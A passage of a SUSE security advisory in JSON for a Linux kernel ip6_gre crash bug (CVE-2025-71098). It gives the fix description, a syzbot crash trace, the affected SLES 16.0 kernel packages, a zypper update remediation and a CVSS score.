"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_gre: make ip6gre_header() robust\n\nOver the years, syzbot found many ways to crash the kernel\nin ip6gre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ip6gre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff8a1d69a8 len:136 put:40 head:ffff888059bc7000 data:ffff888059bc6fe8 tail:0x70 end:0x6c0 dev:team0\n------------[ cut here ]------------\n kernel BUG at net/core/skbuff.c:213 !\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ip6gre_header+0xc8/0x790 net/ipv6/ip6_gre.c:1371\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n neigh_output include/net/neighbour.h:556 [inline]\n ip6_finish_output2+0xfb3/0x1480 net/ipv6/ip6_output.c:136\n __ip6_finish_output net/ipv6/ip6_output.c:-1 [inline]\n ip6_finish_output+0x234/0x7d0 net/ipv6/ip6_output.c:220\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71098",
"url": "https://www.suse.com/security/cve/CVE-2025-71098"
},
{
"category": "external",
"summary": "SUSE Bug 1256591 for CVE-2025-71098",
"url": "https://bugzilla.suse.com/1256591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
